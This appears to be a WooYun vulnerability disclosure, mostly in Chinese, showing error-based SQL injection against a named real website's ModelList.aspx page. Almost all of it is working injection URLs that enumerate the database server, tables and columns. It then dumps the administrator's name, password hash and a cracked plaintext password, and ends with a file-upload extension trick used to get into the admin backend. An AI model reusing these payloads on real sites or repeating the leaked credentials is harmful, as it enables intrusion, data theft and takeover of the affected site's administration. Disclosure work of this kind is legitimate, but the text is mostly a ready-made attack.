WooYun.org

http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select @@version) or '1'='1-b,-1,-1,-1,-1,-1,-1
user()
@@version
db_name()
@@servername
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select is_srvrolemember('db_owner')
and 1=(select is_srvrolemember('public')
爆数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select name from master.dbo.sysdatabases where dbid=1) or '1'='1-b,-1,-1,-1,-1,-1,-1
当前数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select db_name()) or '1'='1-b,-1,-1,-1,-1,-1,-1
------> chinaeve
报表:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 table_name from information_schema.tables where table_name not in(select top 1 table_name from information_schema.tables)) or '1'='1-b,-1,-1,-1,-1,-1,-1
tb_productType
tb_purchase
tb_Schedul
img
tb_Member
tb_Model_Data
tb_CompanyAccount1
tb_CompanyAccount
tb_Sysadmin
爆字段:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 column_name from information_schema.columns where table_name='tb_Sysadmin' and column_name not in(select top 0 column_name from information_schema.columns where table_name='tb_Sysadmin' order by column_name) order by column_name) or '1'='1-b,-1,-1,-1,-1,-1,-1
爆账号密码
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminpwd from tb_sysadmin where adminname='admin' order by SysadminID ) or '1'='1-b,-1,-1,-1,-1,-1,-1
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminname from tb_sysadmin order by SysadminID) or '1'='1-b,-1,-1,-1,-1,-1,-1
admin
94F233EA56EF21D9D740CC9768426935909EDED6 ：zaochenxinglai
进管理员后台，新闻管理 上传图片 传asp;.jpg 失效，传php;.jpg 成功